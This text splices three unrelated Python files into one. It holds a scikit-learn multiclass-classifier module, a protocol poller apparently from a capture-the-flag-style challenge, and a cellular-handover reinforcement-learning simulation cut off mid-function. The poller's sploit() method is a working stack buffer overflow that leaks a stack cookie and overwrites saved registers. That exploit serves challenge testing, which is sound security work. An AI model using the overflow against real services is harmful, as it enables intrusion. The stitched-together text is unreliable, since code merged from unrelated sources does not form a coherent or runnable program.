"""
Multiclass and multilabel classification strategies
===================================================
This module implements multiclass learning algorithms:
- one-vs-the-rest / one-vs-all
- one-vs-one
- error correcting output codes
The estimators provided in this module are meta-estimators: they require a base
estimator to be provided in their constructor. For example, it is possible to
use these estimators to turn a binary classifier or a regressor into a
multiclass classifier. It is also possible to use these estimators with
multiclass estimators in the hope that their accuracy or runtime performance
improves.
All classifiers in scikit-learn implement multiclass classification; you
only need to use this module if you want to experiment with custom multiclass
strategies.
The one-vs-the-rest meta-classifier also implements a `predict_proba` method,
so long as such a method is implemented by the base classifier. This method
returns probabilities of class membership in both the single label and
multilabel case. Note that in the multilabel case, probabilities are the
marginal probability that a given sample falls in the given class. As such, in
the multilabel case the sum of these probabilities over all possible labels
for a given sample *will not* sum to unity, as they do in the single label
case.
"""
# Author: Mathieu Blondel <mathieu@mblondel.org>
# Author: Hamzeh Alsalhi <93hamsal@gmail.com>
#
# License: BSD 3 clause
import array
import numpy as np
import warnings
import scipy.sparse as sp
from .base import BaseEstimator, ClassifierMixin, clone, is_classifier
from .base import MetaEstimatorMixin
from .preprocessing import LabelBinarizer
from .metrics.pairwise import euclidean_distances
from .utils import check_random_state
from .utils.validation import (
_num_samples,
check_consistent_length,
check_is_fitted)
from .utils import deprecated
from .externals.joblib import Parallel
from .externals.joblib import delayed
__all__ = [
"OneVsRestClassifier",
"OneVsOneClassifier",
"OutputCodeClassifier",
]
def _fit_binary(estimator, X, y, classes=None):
"""Fit a single binary estimator."""
unique_y = np.unique(y)
if len(unique_y) == 1:
if classes is not None:
if y[0] == -1:
c = 0
else:
c = y[0]
warnings.warn("Label %s is present in all training examples." %
str(classes[c]))
estimator = _ConstantPredictor().fit(X, unique_y)
else:
estimator = clone(estimator)
estimator.fit(X, y)
return estimator
def _predict_binary(estimator, X):
"""Make predictions using a single binary estimator."""
try:
score = np.ravel(estimator.decision_function(X))
except (AttributeError, NotImplementedError):
# probabilities of the positive class
score = estimator.predict_proba(X)[:, 1]
return score
def _check_estimator(estimator):
"""Make sure that an estimator implements the necessary methods."""
if (not hasattr(estimator, "decision_function") and
not hasattr(estimator, "predict_proba")):
raise ValueError("The base estimator should implement "
"decision_function or predict_proba!")
@deprecated("fit_ovr is deprecated and will be removed in 0.18."
"Use the OneVsRestClassifier instead.")
def fit_ovr(estimator, X, y, n_jobs=1):
"""Fit a one-vs-the-rest strategy.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
y : (sparse) array-like, shape = [n_samples] or [n_samples, n_classes]
Multi-class targets. An indicator matrix turns on multilabel
classification.
Returns
-------
estimators : list of estimators object
The list of fitted estimator.
lb : fitted LabelBinarizer
"""
ovr = OneVsRestClassifier(estimator, n_jobs=n_jobs).fit(X, y)
return ovr.estimators_, ovr.label_binarizer_
@deprecated("predict_ovr is deprecated and will be removed in 0.18."
"Use the OneVsRestClassifier instead.")
def predict_ovr(estimators, label_binarizer, X):
"""Predict multi-class targets using the one vs rest strategy.
Parameters
----------
estimators : list of `n_classes` estimators, Estimators used for
predictions. The list must be homogeneous with respect to the type of
estimators. fit_ovr supplies this list as part of its output.
label_binarizer : LabelBinarizer object, Object used to transform
multiclass labels to binary labels and vice-versa. fit_ovr supplies
this object as part of its output.
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
Returns
-------
y : (sparse) array-like, shape = [n_samples] or [n_samples, n_classes].
Predicted multi-class targets.
"""
e_types = set([type(e) for e in estimators if not
isinstance(e, _ConstantPredictor)])
if len(e_types) > 1:
raise ValueError("List of estimators must contain estimators of the"
" same type but contains types {0}".format(e_types))
ovr = OneVsRestClassifier(clone(estimators[0]))
ovr.estimators_ = estimators
ovr.label_binarizer_ = label_binarizer
return ovr.predict(X)
@deprecated("predict_proba_ovr is deprecated and will be removed in 0.18."
"Use the OneVsRestClassifier instead.")
def predict_proba_ovr(estimators, X, is_multilabel):
e_types = set([type(e) for e in estimators if not
isinstance(e, _ConstantPredictor)])
if len(e_types) > 1:
raise ValueError("List of estimators must contain estimators of the"
" same type but contains types {0}".format(e_types))
Y = np.array([e.predict_proba(X)[:, 1] for e in estimators]).T
if not is_multilabel:
# Then, probabilities should be normalized to 1.
Y /= np.sum(Y, axis=1)[:, np.newaxis]
return Y
class _ConstantPredictor(BaseEstimator):
def fit(self, X, y):
self.y_ = y
return self
def predict(self, X):
check_is_fitted(self, 'y_')
return np.repeat(self.y_, X.shape[0])
def decision_function(self, X):
check_is_fitted(self, 'y_')
return np.repeat(self.y_, X.shape[0])
def predict_proba(self, X):
check_is_fitted(self, 'y_')
return np.repeat([np.hstack([1 - self.y_, self.y_])],
X.shape[0], axis=0)
class OneVsRestClassifier(BaseEstimator, ClassifierMixin, MetaEstimatorMixin):
"""One-vs-the-rest (OvR) multiclass/multilabel strategy
Also known as one-vs-all, this strategy consists in fitting one classifier
per class. For each classifier, the class is fitted against all the other
classes. In addition to its computational efficiency (only `n_classes`
classifiers are needed), one advantage of this approach is its
    interpretability. Since each class is represented by one and only one
    classifier, it is possible to gain knowledge about the class by inspecting its
corresponding classifier. This is the most commonly used strategy for
multiclass classification and is a fair default choice.
This strategy can also be used for multilabel learning, where a classifier
    is used to predict multiple labels per instance, by fitting on a 2-d matrix
in which cell [i, j] is 1 if sample i has label j and 0 otherwise.
In the multilabel learning literature, OvR is also known as the binary
relevance method.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. If -1 all CPUs are used.
If 1 is given, no parallel computing code is used at all, which is
useful for debugging. For n_jobs below -1, (n_cpus + 1 + n_jobs) are
used. Thus for n_jobs = -2, all CPUs but one are used.
Attributes
----------
estimators_ : list of `n_classes` estimators
Estimators used for predictions.
classes_ : array, shape = [`n_classes`]
Class labels.
label_binarizer_ : LabelBinarizer object
Object used to transform multiclass labels to binary labels and
vice-versa.
multilabel_ : boolean
Whether a OneVsRestClassifier is a multilabel classifier.
"""
def __init__(self, estimator, n_jobs=1):
self.estimator = estimator
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
y : (sparse) array-like, shape = [n_samples] or [n_samples, n_classes]
Multi-class targets. An indicator matrix turns on multilabel
classification.
Returns
-------
self
"""
# A sparse LabelBinarizer, with sparse_output=True, has been shown to
        # outperform or match a dense label binarizer in all cases and has also
# resulted in less or equal memory consumption in the fit_ovr function
# overall.
self.label_binarizer_ = LabelBinarizer(sparse_output=True)
Y = self.label_binarizer_.fit_transform(y)
Y = Y.tocsc()
columns = (col.toarray().ravel() for col in Y.T)
        # In cases where individual estimators are very fast to train, setting
        # n_jobs > 1 can result in slower performance due to the overhead
# of spawning threads. See joblib issue #112.
self.estimators_ = Parallel(n_jobs=self.n_jobs)(delayed(_fit_binary)
(self.estimator, X, column,
classes=["not %s" % self.label_binarizer_.classes_[i],
self.label_binarizer_.classes_[i]])
for i, column in enumerate(columns))
return self
def predict(self, X):
"""Predict multi-class targets using underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
Returns
-------
y : (sparse) array-like, shape = [n_samples] or [n_samples, n_classes].
Predicted multi-class targets.
"""
check_is_fitted(self, 'estimators_')
if (hasattr(self.estimators_[0], "decision_function") and
is_classifier(self.estimators_[0])):
thresh = 0
else:
thresh = .5
n_samples = _num_samples(X)
if self.label_binarizer_.y_type_ == "multiclass":
maxima = np.empty(n_samples, dtype=float)
maxima.fill(-np.inf)
argmaxima = np.zeros(n_samples, dtype=int)
for i, e in enumerate(self.estimators_):
pred = _predict_binary(e, X)
np.maximum(maxima, pred, out=maxima)
argmaxima[maxima == pred] = i
return self.label_binarizer_.classes_[np.array(argmaxima.T)]
else:
indices = array.array('i')
indptr = array.array('i', [0])
for e in self.estimators_:
indices.extend(np.where(_predict_binary(e, X) > thresh)[0])
indptr.append(len(indices))
data = np.ones(len(indices), dtype=int)
indicator = sp.csc_matrix((data, indices, indptr),
shape=(n_samples, len(self.estimators_)))
return self.label_binarizer_.inverse_transform(indicator)
def predict_proba(self, X):
"""Probability estimates.
The returned estimates for all classes are ordered by label of classes.
Note that in the multilabel case, each sample can have any number of
labels. This returns the marginal probability that the given sample has
the label in question. For example, it is entirely consistent that two
labels both have a 90% probability of applying to a given sample.
In the single label multiclass case, the rows of the returned matrix
sum to 1.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
T : (sparse) array-like, shape = [n_samples, n_classes]
Returns the probability of the sample for each class in the model,
where classes are ordered as they are in `self.classes_`.
"""
check_is_fitted(self, 'estimators_')
# Y[i,j] gives the probability that sample i has the label j.
# In the multi-label case, these are not disjoint.
Y = np.array([e.predict_proba(X)[:, 1] for e in self.estimators_]).T
if len(self.estimators_) == 1:
# Only one estimator, but we still want to return probabilities
# for two classes.
Y = np.concatenate(((1 - Y), Y), axis=1)
if not self.multilabel_:
# Then, probabilities should be normalized to 1.
Y /= np.sum(Y, axis=1)[:, np.newaxis]
return Y
def decision_function(self, X):
"""Returns the distance of each sample from the decision boundary for
each class. This can only be used with estimators which implement the
decision_function method.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
T : array-like, shape = [n_samples, n_classes]
"""
check_is_fitted(self, 'estimators_')
if not hasattr(self.estimators_[0], "decision_function"):
raise AttributeError(
"Base estimator doesn't have a decision_function attribute.")
return np.array([est.decision_function(X).ravel()
for est in self.estimators_]).T
@property
def multilabel_(self):
"""Whether this is a multilabel classifier"""
return self.label_binarizer_.y_type_.startswith('multilabel')
@property
def classes_(self):
return self.label_binarizer_.classes_
@property
def coef_(self):
check_is_fitted(self, 'estimators_')
if not hasattr(self.estimators_[0], "coef_"):
raise AttributeError(
"Base estimator doesn't have a coef_ attribute.")
return np.array([e.coef_.ravel() for e in self.estimators_])
@property
def intercept_(self):
check_is_fitted(self, 'estimators_')
if not hasattr(self.estimators_[0], "intercept_"):
raise AttributeError(
"Base estimator doesn't have an intercept_ attribute.")
return np.array([e.intercept_.ravel() for e in self.estimators_])
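# A minimal usage sketch for OneVsRestClassifier (illustrative only; the
# dataset loader is an assumption, and any binary classifier exposing
# `decision_function` or `predict_proba` can stand in for LinearSVC):
#
#     from sklearn.datasets import load_iris
#     from sklearn.multiclass import OneVsRestClassifier
#     from sklearn.svm import LinearSVC
#
#     iris = load_iris()
#     clf = OneVsRestClassifier(LinearSVC()).fit(iris.data, iris.target)
#     print(clf.predict(iris.data[:3]))     # one fitted estimator per class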
def _fit_ovo_binary(estimator, X, y, i, j):
"""Fit a single binary estimator (one-vs-one)."""
cond = np.logical_or(y == i, y == j)
y = y[cond]
    y_binary = np.empty(y.shape, int)
y_binary[y == i] = 0
y_binary[y == j] = 1
ind = np.arange(X.shape[0])
return _fit_binary(estimator, X[ind[cond]], y_binary, classes=[i, j])
@deprecated("fit_ovo is deprecated and will be removed in 0.18."
"Use the OneVsOneClassifier instead.")
def fit_ovo(estimator, X, y, n_jobs=1):
ovo = OneVsOneClassifier(estimator, n_jobs=n_jobs).fit(X, y)
return ovo.estimators_, ovo.classes_
@deprecated("predict_ovo is deprecated and will be removed in 0.18."
"Use the OneVsOneClassifier instead.")
def predict_ovo(estimators, classes, X):
"""Make predictions using the one-vs-one strategy."""
e_types = set([type(e) for e in estimators if not
isinstance(e, _ConstantPredictor)])
if len(e_types) > 1:
raise ValueError("List of estimators must contain estimators of the"
" same type but contains types {0}".format(e_types))
ovo = OneVsOneClassifier(clone(estimators[0]))
ovo.estimators_ = estimators
ovo.classes_ = classes
return ovo.predict(X)
class OneVsOneClassifier(BaseEstimator, ClassifierMixin, MetaEstimatorMixin):
"""One-vs-one multiclass strategy
This strategy consists in fitting one classifier per class pair.
At prediction time, the class which received the most votes is selected.
    Since it requires fitting `n_classes * (n_classes - 1) / 2` classifiers,
this method is usually slower than one-vs-the-rest, due to its
O(n_classes^2) complexity. However, this method may be advantageous for
algorithms such as kernel algorithms which don't scale well with
`n_samples`. This is because each individual learning problem only involves
a small subset of the data whereas, with one-vs-the-rest, the complete
dataset is used `n_classes` times.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. If -1 all CPUs are used.
If 1 is given, no parallel computing code is used at all, which is
useful for debugging. For n_jobs below -1, (n_cpus + 1 + n_jobs) are
used. Thus for n_jobs = -2, all CPUs but one are used.
Attributes
----------
estimators_ : list of `n_classes * (n_classes - 1) / 2` estimators
Estimators used for predictions.
classes_ : numpy array of shape [n_classes]
Array containing labels.
"""
def __init__(self, estimator, n_jobs=1):
self.estimator = estimator
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
y : array-like, shape = [n_samples]
Multi-class targets.
Returns
-------
self
"""
y = np.asarray(y)
check_consistent_length(X, y)
self.classes_ = np.unique(y)
n_classes = self.classes_.shape[0]
self.estimators_ = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_ovo_binary)(
self.estimator, X, y, self.classes_[i], self.classes_[j])
for i in range(n_classes) for j in range(i + 1, n_classes))
return self
def predict(self, X):
"""Predict multi-class targets using underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
Returns
-------
y : numpy array of shape [n_samples]
Predicted multi-class targets.
"""
check_is_fitted(self, 'estimators_')
n_samples = X.shape[0]
n_classes = self.classes_.shape[0]
votes = np.zeros((n_samples, n_classes))
scores = np.zeros((n_samples, n_classes))
k = 0
for i in range(n_classes):
for j in range(i + 1, n_classes):
pred = self.estimators_[k].predict(X)
score = _predict_binary(self.estimators_[k], X)
scores[:, i] -= score
scores[:, j] += score
votes[pred == 0, i] += 1
votes[pred == 1, j] += 1
k += 1
# find all places with maximum votes per sample
maxima = votes == np.max(votes, axis=1)[:, np.newaxis]
# if there are ties, use scores to break them
if np.any(maxima.sum(axis=1) > 1):
scores[~maxima] = -np.inf
prediction = scores.argmax(axis=1)
else:
prediction = votes.argmax(axis=1)
return self.classes_[prediction]
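# A minimal usage sketch for OneVsOneClassifier (illustrative; X_train,
# y_train and X_test are hypothetical arrays):
#
#     from sklearn.multiclass import OneVsOneClassifier
#     from sklearn.svm import LinearSVC
#
#     clf = OneVsOneClassifier(LinearSVC()).fit(X_train, y_train)
#     # n_classes * (n_classes - 1) / 2 pairwise estimators are fitted
#     print(len(clf.estimators_), clf.predict(X_test[:3]))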
@deprecated("fit_ecoc is deprecated and will be removed in 0.18."
"Use the OutputCodeClassifier instead.")
def fit_ecoc(estimator, X, y, code_size=1.5, random_state=None, n_jobs=1):
"""Fit an error-correcting output-code strategy.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
code_size : float, optional
Percentage of the number of classes to be used to create the code book.
random_state : numpy.RandomState, optional
The generator used to initialize the codebook. Defaults to
numpy.random.
Returns
    -------
estimators : list of `int(n_classes * code_size)` estimators
Estimators used for predictions.
classes : numpy array of shape [n_classes]
Array containing labels.
code_book_ : numpy array of shape [n_classes, code_size]
Binary array containing the code of each class.
"""
ecoc = OutputCodeClassifier(estimator, random_state=random_state,
n_jobs=n_jobs).fit(X, y)
return ecoc.estimators_, ecoc.classes_, ecoc.code_book_
@deprecated("predict_ecoc is deprecated and will be removed in 0.18."
"Use the OutputCodeClassifier instead.")
def predict_ecoc(estimators, classes, code_book, X):
"""Make predictions using the error-correcting output-code strategy."""
ecoc = OutputCodeClassifier(clone(estimators[0]))
ecoc.classes_ = classes
ecoc.estimators_ = estimators
ecoc.code_book_ = code_book
return ecoc.predict(X)
class OutputCodeClassifier(BaseEstimator, ClassifierMixin, MetaEstimatorMixin):
"""(Error-Correcting) Output-Code multiclass strategy
Output-code based strategies consist in representing each class with a
binary code (an array of 0s and 1s). At fitting time, one binary
classifier per bit in the code book is fitted. At prediction time, the
classifiers are used to project new points in the class space and the class
closest to the points is chosen. The main advantage of these strategies is
that the number of classifiers used can be controlled by the user, either
for compressing the model (0 < code_size < 1) or for making the model more
robust to errors (code_size > 1). See the documentation for more details.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
code_size : float
Percentage of the number of classes to be used to create the code book.
A number between 0 and 1 will require fewer classifiers than
one-vs-the-rest. A number greater than 1 will require more classifiers
than one-vs-the-rest.
random_state : numpy.RandomState, optional
The generator used to initialize the codebook. Defaults to
numpy.random.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. If -1 all CPUs are used.
If 1 is given, no parallel computing code is used at all, which is
useful for debugging. For n_jobs below -1, (n_cpus + 1 + n_jobs) are
used. Thus for n_jobs = -2, all CPUs but one are used.
Attributes
----------
estimators_ : list of `int(n_classes * code_size)` estimators
Estimators used for predictions.
classes_ : numpy array of shape [n_classes]
Array containing labels.
code_book_ : numpy array of shape [n_classes, code_size]
Binary array containing the code of each class.
References
----------
.. [1] "Solving multiclass learning problems via error-correcting output
codes",
Dietterich T., Bakiri G.,
Journal of Artificial Intelligence Research 2,
1995.
.. [2] "The error coding method and PICTs",
James G., Hastie T.,
Journal of Computational and Graphical statistics 7,
1998.
.. [3] "The Elements of Statistical Learning",
Hastie T., Tibshirani R., Friedman J., page 606 (second-edition)
2008.
"""
def __init__(self, estimator, code_size=1.5, random_state=None, n_jobs=1):
self.estimator = estimator
self.code_size = code_size
self.random_state = random_state
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
y : numpy array of shape [n_samples]
Multi-class targets.
Returns
-------
self
"""
if self.code_size <= 0:
raise ValueError("code_size should be greater than 0, got {1}"
"".format(self.code_size))
_check_estimator(self.estimator)
random_state = check_random_state(self.random_state)
self.classes_ = np.unique(y)
n_classes = self.classes_.shape[0]
code_size_ = int(n_classes * self.code_size)
# FIXME: there are more elaborate methods than generating the codebook
# randomly.
self.code_book_ = random_state.random_sample((n_classes, code_size_))
self.code_book_[self.code_book_ > 0.5] = 1
if hasattr(self.estimator, "decision_function"):
self.code_book_[self.code_book_ != 1] = -1
else:
self.code_book_[self.code_book_ != 1] = 0
classes_index = dict((c, i) for i, c in enumerate(self.classes_))
Y = np.array([self.code_book_[classes_index[y[i]]]
                      for i in range(X.shape[0])], dtype=int)
self.estimators_ = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_binary)(self.estimator, X, Y[:, i])
for i in range(Y.shape[1]))
return self
def predict(self, X):
"""Predict multi-class targets using underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
Returns
-------
y : numpy array of shape [n_samples]
Predicted multi-class targets.
"""
check_is_fitted(self, 'estimators_')
Y = np.array([_predict_binary(e, X) for e in self.estimators_]).T
pred = euclidean_distances(Y, self.code_book_).argmin(axis=1)
return self.classes_[pred]
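# A minimal usage sketch for OutputCodeClassifier (illustrative; X_train,
# y_train and X_test are hypothetical arrays). code_size controls the width
# of the code book: int(n_classes * code_size) binary estimators are fitted.
#
#     from sklearn.multiclass import OutputCodeClassifier
#     from sklearn.svm import LinearSVC
#
#     clf = OutputCodeClassifier(LinearSVC(), code_size=2.0, random_state=0)
#     clf.fit(X_train, y_train)
#     print(clf.predict(X_test[:3]))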
#!/usr/bin/env python
#
# Copyright (C) 2014
# Brian Caswell <bmc@lungetech.com>
# Narf Industries <info@narfindustries.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import string
import sys
import os
from os.path import join,dirname,abspath
from generator.actions import Actions
from random import choice,randint
from struct import *
lehdr = "PTTC"
behdr = "CTTP"
INTERNALERR = "If anyone asks, you're my debugger.\x00"
SUBMITOK = "Oh, sure. Let the robot do all the work.\x00"
DELETEOK = "Hopes: deleted.\x00"
NOTIMPLEMENTED = "You want me to do *two* things?!\x00"
INFO = 0x4347C000
WARN = 0x4347C001
ERROR = 0x4347C002
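# Request/response wire format, as implied by the pack() calls below (a
# reading of this poller, not an official spec): requests are a little-endian
# "<4sIIIIII" header -- magic ("PTTC"/"CTTP"), version, request code, path
# length, body length, and two zeroed fields -- followed by the path and body
# bytes; plain responses are a "<4sII" header -- magic, status code, body
# length -- followed by the body.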
def random_alpha(a, b):
return ''.join(choice(string.letters) for _ in range(randint(a, b)))
def chunks(l, n):
for i in xrange(0, len(l), n):
yield l[i:i+n]
class CTTP(Actions):
def start(self):
self.files = {}
def _retrieve(self, ver, code):
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = random_alpha(10,100)
body = ""
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0) + path + body
fmt = "<4sII" if le else ">4sII"
        if path in self.files:
            body = self.files[path]
            code = 0xbaaaaaaa
        else:
            body = INTERNALERR
            code = 0xbaaaaaab
return (pkt, pack(fmt, hdr, code, len(body)) + body)
def _submit(self, ver, code, body):
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = random_alpha(10,100)
while path in self.files:
path = random_alpha(10,100)
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0) + path + body
fmt = "<4sII" if le else ">4sII"
self.files[path] = body
        code = 0xbaaaaaaa
body = SUBMITOK
return (pkt, pack(fmt, hdr, code, len(body)) + body)
def _auth(self, ver, code):
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = self.files.keys()[0]
body = ""
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0) + path + body
fmt = "<4sII" if le else ">4sII"
#fixed in c file
challenge = "temp"
key = 0xff
encoded = challenge
token = 0xdeadbeef
etoken = pack("<I",token)
self.write(pkt)
self.read(length=len(challenge)+5+4, expect=pack("<BI",key,len(challenge))+encoded+etoken)
body = self.files[path]
        code = 0xbaaaaaaa
key = 0x00
body = "".join(chr(ord(i)^key) for i in body)
return (challenge+pack("<I",token^0x127a1b76), pack(fmt, hdr, code, len(body)) + body)
def _quit(self, ver, code):
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = ""
body = ""
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0) + path + body
resp = "done"
return (pkt, resp)
def do_auth(self):
code = 0x41414141
ver = 0x10000000
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = random_alpha(10,100)
body = ""
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0)
fmt = "<4sII" if le else ">4sII"
respbody = INTERNALERR
        respcode = 0xbaaaaaab
#fixed in c file
challenge = "temp"
key = 0xff
encoded = challenge
token = 0xdeadbeef
etoken = pack("<I",token)
self.write(pkt)
self.read(length=len(challenge)+5+4, expect=pack("<BI",key,len(challenge))+encoded+etoken)
self.write(challenge+pack("<I",token^0x127a1b76)+path+body)
resp = pack(fmt, hdr, respcode, len(respbody)) + respbody
self.read(length=len(resp), expect=resp)
def sploit(self):
self.do_auth()
        # will overwrite s, leaking out 28 extra bytes of stack,
        # encoded with a single-byte xor key from the flag page
req, resp = self._submit(0x10000000, 0x41414142, "A"*4096+pack("<I",4096+28))
self.write(req)
self.read(length=len(resp), expect=resp)
#request file, leak stack cookie, valid fp, and valid cttpresp_t
#decoding logic added in c
req, resp = self._auth(0x10000002, 0x41414144)
self.write(req)
self.read(length=len(resp), expect=resp)
#reset, hack because laziness
self.files = {}
#submit file to prove vulnerability
req, resp = self._submit(0x10000000, 0x41414142,"A"*4096+pack("<I",4096)+"BBBBCCCCDDDDEEEEFFFF" + "SSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ")
self.write(req)
self.read(length=len(resp), expect=resp)
#pwn
req, resp = self._auth(0x10000002, 0x41414144)
self.write(req)
self.read(length=len(resp), expect=resp)
#quit
ver = 0x10000000
req, resp = self._quit(ver, 0x41414146)
self.write(req)
self.read(length=len(resp), expect=resp)
def quit(self):
pass
import sys
import random
import numpy as np
from constants import LOCAL_T_MAX
from collections import Counter
from math import exp
from constants import direction
from constants import direction_index
# 400 pixels represent the largest distance of the area, i.e. 100 m
WINDOW_WIDTH = 400 * 40   # size of the window's width in pixels
WINDOW_HEIGHT = 400 * 40  # size of the window's height in pixels
cell_radius = 4  # the radius of a cell, in meters
resolution = cell_radius * 4. / WINDOW_WIDTH  # meters/pixel; the longest distance in the simulation system is "cell_radius * 4"
outlayer_userrange_x_low = -30 / resolution
outlayer_userrange_x_high = 30 / resolution
outlayer_userrange_y_low = -30 / resolution
outlayer_userrange_y_high = 30 / resolution
outer_radius = 50/ resolution
inner_radius = 22.5 / resolution
Num_CELL = 6
NUM_USER = 1 # In asynchronous deep Q learning, only one user in one thread
# generate cell list, every cell in the lists consists of 5 params:
# (1)loc_x(left) (2)loc_y(top) (3)cell_id
# :return: cell_list: (1)loc_x(left) (2)loc_y(top) (3)cell_id
# cell location
cell_id = np.arange(Num_CELL)
# the locations of cells are fixed and the coordinates are given
# cell_x = [200, 200, 370, 370, 200, 30, 30]
# cell_y = [200, 0, 100, 300, 400, 300, 100]
cell_x = [ 0.0, 170.0*40, 170.0*40, 0.0, -170*40, -170*40]
cell_y = [ 200.0*40, 100.0*40, -100.0*40, -200.0*40, -100*40, 100*40]
cells = np.vstack((cell_x, cell_y,cell_id)).T
# "action" is the "cell_id" selected by the agent
class SystemModel:
def __init__(self):
self.init_users()
self.s_t = self._get_state()
self.handover_indicator = 0 #np.zeros(LOCAL_T_MAX)
self.reward_handover = 0
        self.handover_consumption = 7.5
self.terminal = False
self.direction = direction
self.direction_index = direction_index
# def intialize_para(self):
# self.count_no_handover = 0
# self.count_no_failure = 0
# self.count_failure = 0
# self.count_handover_total=0
# self.count_handover = 0
    def state_update(self, last_action, action):
        """
        Generate the reward and state, and update the user locations.
        :param last_action: the "cell_id" selected at the previous step
        :param action: the "cell_id" selected by the user at the current step
        """
self.rates = get_rate_percell(self.users, cells)
s_t = self._get_state()
r, rate = self._get_reward(last_action,action)
self.test_rates=self.rates
self._move_user()
self.rates = get_rate_percell(self.users, cells)
s_t1 = self._get_state()
self.reward = r
self.s_t = s_t
self.s_t1 = s_t1
self.rate = rate
def update(self):
self.s_t = self.s_t1
def _move_user(self):
"""
        Low-mobility users are considered, i.e. the user moves only one pixel per
        frame. Different mobility trajectories will be tested to demonstrate the
        robustness of the neural network.
"""
self.terminal = False
mobility_speed = 1 # np.random.randint(1, 3)
index = np.random.choice(self.direction_index, p=[0.25, 0.25, 0.25, 0.25])
self.users = self.users + self.direction[index] * mobility_speed
        if np.abs(self.users[0]) > WINDOW_WIDTH / 2 or np.abs(self.users[1]) > WINDOW_WIDTH / 2:  # np.abs(self.users[0]) > np.sqrt(3)/2.0 * outer_radius or (np.abs(self.users[0])+np.abs(self.users[1])/np.sqrt(3)) > outer_radius: #and (np.abs(user_x_tmp) > np.sqrt(3)/2.0*inner_radius or (np.abs(user_x_tmp)+np.abs(user_y_tmp)/np.sqrt(3)) > inner_radius):
self.terminal = True
def _get_reward(self, last_action, action):
"""
:param users: the location of user before moving
:param action: the taken action to obtain "users"
:return: reward : the weighted sum of rate and reward for handover, i.e. "handover error occurs" -- 0, "handover successes" -- 1
"""
# reward_weight_rate =0.5
rate = self.rates[action]
# last_rate = self.rates[last_action]
if action == last_action:
self.handover_indicator = 0
# self.count_no_handover += 1.0
else:
self.handover_indicator = 1
# self.count_handover_total += 1.0
reward = rate - self.handover_indicator * self.handover_consumption
# if action == last_action and self.count_handover < LOCAL_T_MAX :#andrate >0.5
# self.reward_handover = 0.5
# self.handover_indicator[self.count_handover] = 0
# self.count_no_handover += 1.0
# self.count_handover +=1.0
# # if action == self.serve_cell_id and rate <0.5:
# # self.reward_handover = 0
# # self.handover_indicator[self.count_handover] = 0
# # self.count_handover += 1
# elif (self.handover_indicator[0] == 1 ):#or rate<0.5
# self.reward_handover = -1
# self.count_handover_total += 1.0
# self.count_handover = 0
# self.handover_indicator[self.count_handover] = 1
# elif self.handover_indicator[0] != 1 and rate > last_rate:#and rate>0.5
# self.reward_handover = 1
# self.count_handover = 0
# self.handover_indicator[self.count_handover] = 1
# self.count_handover_total += 1.0
# elif self.handover_indicator[0] != 1 and rate < last_rate:
# self.reward_handover = -1
# self.count_handover = 0
# self.handover_indicator[self.count_handover] = 1
# self.count_handover_total += 1.0
# self.reward_rate = rate - last_rate
# self.reward_rate = np.clip(differ_rate,-5,5)
# if action != last_action:
# self.count_handover += 1.0
# else:
# self.count_no_handover += 1.0
#
# if rate < last_rate:
#
# self.reward_rate = -0.1
#
# else:
# self.reward_rate = 0.1
self.serve_cell_id = action
# if rate > 1.5:
